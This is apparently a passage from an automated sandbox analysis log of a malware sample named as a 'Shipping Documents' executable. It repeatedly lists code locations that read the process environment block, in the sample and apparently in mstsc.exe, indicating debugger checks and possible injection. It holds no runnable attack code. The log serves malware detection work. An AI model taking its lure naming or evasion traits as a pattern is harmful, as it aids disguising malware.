          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE03E2 mov eax, dword ptr fs:[00000030h]2_2_00AE03E2
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE03E2 mov eax, dword ptr fs:[00000030h]2_2_00AE03E2
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE03E2 mov eax, dword ptr fs:[00000030h]2_2_00AE03E2
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE03E2 mov eax, dword ptr fs:[00000030h]2_2_00AE03E2
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE03E2 mov eax, dword ptr fs:[00000030h]2_2_00AE03E2
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B353CA mov eax, dword ptr fs:[00000030h]2_2_00B353CA
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B353CA mov eax, dword ptr fs:[00000030h]2_2_00B353CA
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B7131B mov eax, dword ptr fs:[00000030h]2_2_00B7131B
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABDB60 mov ecx, dword ptr fs:[00000030h]2_2_00ABDB60
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE3B7A mov eax, dword ptr fs:[00000030h]2_2_00AE3B7A
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE3B7A mov eax, dword ptr fs:[00000030h]2_2_00AE3B7A
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B88B58 mov eax, dword ptr fs:[00000030h]2_2_00B88B58
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABDB40 mov eax, dword ptr fs:[00000030h]2_2_00ABDB40
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABF358 mov eax, dword ptr fs:[00000030h]2_2_00ABF358
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC849B mov eax, dword ptr fs:[00000030h]2_2_00AC849B
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B36CF0 mov eax, dword ptr fs:[00000030h]2_2_00B36CF0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B36CF0 mov eax, dword ptr fs:[00000030h]2_2_00B36CF0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B36CF0 mov eax, dword ptr fs:[00000030h]2_2_00B36CF0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B714FB mov eax, dword ptr fs:[00000030h]2_2_00B714FB
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B88CD6 mov eax, dword ptr fs:[00000030h]2_2_00B88CD6
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEBC2C mov eax, dword ptr fs:[00000030h]2_2_00AEBC2C
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]2_2_00B71C06
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]2_2_00B71C06
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]2_2_00B71C06
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]2_2_00B71C06
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]2_2_00B71C06
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]2_2_00B71C06
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]2_2_00B71C06
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]2_2_00B71C06
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]2_2_00B71C06
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]2_2_00B71C06
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]2_2_00B71C06
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]2_2_00B71C06
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]2_2_00B71C06
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B71C06 mov eax, dword ptr fs:[00000030h]2_2_00B71C06
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B8740D mov eax, dword ptr fs:[00000030h]2_2_00B8740D
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B8740D mov eax, dword ptr fs:[00000030h]2_2_00B8740D
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B8740D mov eax, dword ptr fs:[00000030h]2_2_00B8740D
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B36C0A mov eax, dword ptr fs:[00000030h]2_2_00B36C0A
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B36C0A mov eax, dword ptr fs:[00000030h]2_2_00B36C0A
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B36C0A mov eax, dword ptr fs:[00000030h]2_2_00B36C0A
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B36C0A mov eax, dword ptr fs:[00000030h]2_2_00B36C0A
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AD746D mov eax, dword ptr fs:[00000030h]2_2_00AD746D
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B4C450 mov eax, dword ptr fs:[00000030h]2_2_00B4C450
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B4C450 mov eax, dword ptr fs:[00000030h]2_2_00B4C450
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEA44B mov eax, dword ptr fs:[00000030h]2_2_00AEA44B
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE35A1 mov eax, dword ptr fs:[00000030h]2_2_00AE35A1
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B805AC mov eax, dword ptr fs:[00000030h]2_2_00B805AC
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B805AC mov eax, dword ptr fs:[00000030h]2_2_00B805AC
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]2_2_00AE1DB5
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]2_2_00AE1DB5
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]2_2_00AE1DB5
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB2D8A mov eax, dword ptr fs:[00000030h]2_2_00AB2D8A
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB2D8A mov eax, dword ptr fs:[00000030h]2_2_00AB2D8A
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB2D8A mov eax, dword ptr fs:[00000030h]2_2_00AB2D8A
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB2D8A mov eax, dword ptr fs:[00000030h]2_2_00AB2D8A
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB2D8A mov eax, dword ptr fs:[00000030h]2_2_00AB2D8A
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE2581 mov eax, dword ptr fs:[00000030h]2_2_00AE2581
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE2581 mov eax, dword ptr fs:[00000030h]2_2_00AE2581
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE2581 mov eax, dword ptr fs:[00000030h]2_2_00AE2581
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE2581 mov eax, dword ptr fs:[00000030h]2_2_00AE2581
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEFD9B mov eax, dword ptr fs:[00000030h]2_2_00AEFD9B
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEFD9B mov eax, dword ptr fs:[00000030h]2_2_00AEFD9B
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B68DF1 mov eax, dword ptr fs:[00000030h]2_2_00B68DF1
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ACD5E0 mov eax, dword ptr fs:[00000030h]2_2_00ACD5E0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ACD5E0 mov eax, dword ptr fs:[00000030h]2_2_00ACD5E0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]2_2_00B7FDE2
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]2_2_00B7FDE2
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]2_2_00B7FDE2
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]2_2_00B7FDE2
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B36DC9 mov eax, dword ptr fs:[00000030h]2_2_00B36DC9
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B36DC9 mov eax, dword ptr fs:[00000030h]2_2_00B36DC9
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B36DC9 mov eax, dword ptr fs:[00000030h]2_2_00B36DC9
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B36DC9 mov ecx, dword ptr fs:[00000030h]2_2_00B36DC9
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B36DC9 mov eax, dword ptr fs:[00000030h]2_2_00B36DC9
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B36DC9 mov eax, dword ptr fs:[00000030h]2_2_00B36DC9
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B3A537 mov eax, dword ptr fs:[00000030h]2_2_00B3A537
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B88D34 mov eax, dword ptr fs:[00000030h]2_2_00B88D34
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B7E539 mov eax, dword ptr fs:[00000030h]2_2_00B7E539
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE4D3B mov eax, dword ptr fs:[00000030h]2_2_00AE4D3B
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE4D3B mov eax, dword ptr fs:[00000030h]2_2_00AE4D3B
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE4D3B mov eax, dword ptr fs:[00000030h]2_2_00AE4D3B
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]2_2_00AC3D34
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]2_2_00AC3D34
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]2_2_00AC3D34
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]2_2_00AC3D34
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]2_2_00AC3D34
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]2_2_00AC3D34
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]2_2_00AC3D34
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]2_2_00AC3D34
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]2_2_00AC3D34
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]2_2_00AC3D34
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]2_2_00AC3D34
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]2_2_00AC3D34
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]2_2_00AC3D34
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABAD30 mov eax, dword ptr fs:[00000030h]2_2_00ABAD30
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ADC577 mov eax, dword ptr fs:[00000030h]2_2_00ADC577
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ADC577 mov eax, dword ptr fs:[00000030h]2_2_00ADC577
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF3D43 mov eax, dword ptr fs:[00000030h]2_2_00AF3D43
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B33540 mov eax, dword ptr fs:[00000030h]2_2_00B33540
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AD7D50 mov eax, dword ptr fs:[00000030h]2_2_00AD7D50
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B346A7 mov eax, dword ptr fs:[00000030h]2_2_00B346A7
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B80EA5 mov eax, dword ptr fs:[00000030h]2_2_00B80EA5
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B80EA5 mov eax, dword ptr fs:[00000030h]2_2_00B80EA5
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B80EA5 mov eax, dword ptr fs:[00000030h]2_2_00B80EA5
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B4FE87 mov eax, dword ptr fs:[00000030h]2_2_00B4FE87
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE16E0 mov ecx, dword ptr fs:[00000030h]2_2_00AE16E0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC76E2 mov eax, dword ptr fs:[00000030h]2_2_00AC76E2
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE36CC mov eax, dword ptr fs:[00000030h]2_2_00AE36CC
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF8EC7 mov eax, dword ptr fs:[00000030h]2_2_00AF8EC7
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B88ED6 mov eax, dword ptr fs:[00000030h]2_2_00B88ED6
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B6FEC0 mov eax, dword ptr fs:[00000030h]2_2_00B6FEC0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B6FE3F mov eax, dword ptr fs:[00000030h]2_2_00B6FE3F
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABE620 mov eax, dword ptr fs:[00000030h]2_2_00ABE620
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABC600 mov eax, dword ptr fs:[00000030h]2_2_00ABC600
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABC600 mov eax, dword ptr fs:[00000030h]2_2_00ABC600
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABC600 mov eax, dword ptr fs:[00000030h]2_2_00ABC600
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE8E00 mov eax, dword ptr fs:[00000030h]2_2_00AE8E00
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEA61C mov eax, dword ptr fs:[00000030h]2_2_00AEA61C
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEA61C mov eax, dword ptr fs:[00000030h]2_2_00AEA61C
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B71608 mov eax, dword ptr fs:[00000030h]2_2_00B71608
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC766D mov eax, dword ptr fs:[00000030h]2_2_00AC766D
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ADAE73 mov eax, dword ptr fs:[00000030h]2_2_00ADAE73
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ADAE73 mov eax, dword ptr fs:[00000030h]2_2_00ADAE73
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ADAE73 mov eax, dword ptr fs:[00000030h]2_2_00ADAE73
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ADAE73 mov eax, dword ptr fs:[00000030h]2_2_00ADAE73
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ADAE73 mov eax, dword ptr fs:[00000030h]2_2_00ADAE73
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC7E41 mov eax, dword ptr fs:[00000030h]2_2_00AC7E41
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC7E41 mov eax, dword ptr fs:[00000030h]2_2_00AC7E41
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC7E41 mov eax, dword ptr fs:[00000030h]2_2_00AC7E41
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC7E41 mov eax, dword ptr fs:[00000030h]2_2_00AC7E41
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC7E41 mov eax, dword ptr fs:[00000030h]2_2_00AC7E41
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC7E41 mov eax, dword ptr fs:[00000030h]2_2_00AC7E41
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B7AE44 mov eax, dword ptr fs:[00000030h]2_2_00B7AE44
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B7AE44 mov eax, dword ptr fs:[00000030h]2_2_00B7AE44
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B37794 mov eax, dword ptr fs:[00000030h]2_2_00B37794
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B37794 mov eax, dword ptr fs:[00000030h]2_2_00B37794
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B37794 mov eax, dword ptr fs:[00000030h]2_2_00B37794
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC8794 mov eax, dword ptr fs:[00000030h]2_2_00AC8794
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF37F5 mov eax, dword ptr fs:[00000030h]2_2_00AF37F5
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB4F2E mov eax, dword ptr fs:[00000030h]2_2_00AB4F2E
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB4F2E mov eax, dword ptr fs:[00000030h]2_2_00AB4F2E
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEE730 mov eax, dword ptr fs:[00000030h]2_2_00AEE730
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEA70E mov eax, dword ptr fs:[00000030h]2_2_00AEA70E
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEA70E mov eax, dword ptr fs:[00000030h]2_2_00AEA70E
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B4FF10 mov eax, dword ptr fs:[00000030h]2_2_00B4FF10
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B4FF10 mov eax, dword ptr fs:[00000030h]2_2_00B4FF10
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B8070D mov eax, dword ptr fs:[00000030h]2_2_00B8070D
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B8070D mov eax, dword ptr fs:[00000030h]2_2_00B8070D
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ADF716 mov eax, dword ptr fs:[00000030h]2_2_00ADF716
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ACFF60 mov eax, dword ptr fs:[00000030h]2_2_00ACFF60
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B88F6A mov eax, dword ptr fs:[00000030h]2_2_00B88F6A
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ACEF40 mov eax, dword ptr fs:[00000030h]2_2_00ACEF40
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04863884 mov eax, dword ptr fs:[00000030h]7_2_04863884
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04863884 mov eax, dword ptr fs:[00000030h]7_2_04863884
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048120A0 mov eax, dword ptr fs:[00000030h]7_2_048120A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048120A0 mov eax, dword ptr fs:[00000030h]7_2_048120A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048120A0 mov eax, dword ptr fs:[00000030h]7_2_048120A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048120A0 mov eax, dword ptr fs:[00000030h]7_2_048120A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048120A0 mov eax, dword ptr fs:[00000030h]7_2_048120A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048120A0 mov eax, dword ptr fs:[00000030h]7_2_048120A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048290AF mov eax, dword ptr fs:[00000030h]7_2_048290AF
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481F0BF mov ecx, dword ptr fs:[00000030h]7_2_0481F0BF
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481F0BF mov eax, dword ptr fs:[00000030h]7_2_0481F0BF
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481F0BF mov eax, dword ptr fs:[00000030h]7_2_0481F0BF
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047FB02A mov eax, dword ptr fs:[00000030h]7_2_047FB02A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047FB02A mov eax, dword ptr fs:[00000030h]7_2_047FB02A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047FB02A mov eax, dword ptr fs:[00000030h]7_2_047FB02A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047FB02A mov eax, dword ptr fs:[00000030h]7_2_047FB02A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0487B8D0 mov eax, dword ptr fs:[00000030h]7_2_0487B8D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0487B8D0 mov ecx, dword ptr fs:[00000030h]7_2_0487B8D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0487B8D0 mov eax, dword ptr fs:[00000030h]7_2_0487B8D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0487B8D0 mov eax, dword ptr fs:[00000030h]7_2_0487B8D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0487B8D0 mov eax, dword ptr fs:[00000030h]7_2_0487B8D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0487B8D0 mov eax, dword ptr fs:[00000030h]7_2_0487B8D0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B8CD6 mov eax, dword ptr fs:[00000030h]7_2_048B8CD6
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A14FB mov eax, dword ptr fs:[00000030h]7_2_048A14FB
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866CF0 mov eax, dword ptr fs:[00000030h]7_2_04866CF0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866CF0 mov eax, dword ptr fs:[00000030h]7_2_04866CF0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866CF0 mov eax, dword ptr fs:[00000030h]7_2_04866CF0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B740D mov eax, dword ptr fs:[00000030h]7_2_048B740D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B740D mov eax, dword ptr fs:[00000030h]7_2_048B740D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B740D mov eax, dword ptr fs:[00000030h]7_2_048B740D
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]7_2_048A1C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]7_2_048A1C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]7_2_048A1C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]7_2_048A1C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]7_2_048A1C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]7_2_048A1C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]7_2_048A1C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]7_2_048A1C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]7_2_048A1C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]7_2_048A1C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]7_2_048A1C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]7_2_048A1C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]7_2_048A1C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]7_2_048A1C06
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866C0A mov eax, dword ptr fs:[00000030h]7_2_04866C0A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866C0A mov eax, dword ptr fs:[00000030h]7_2_04866C0A
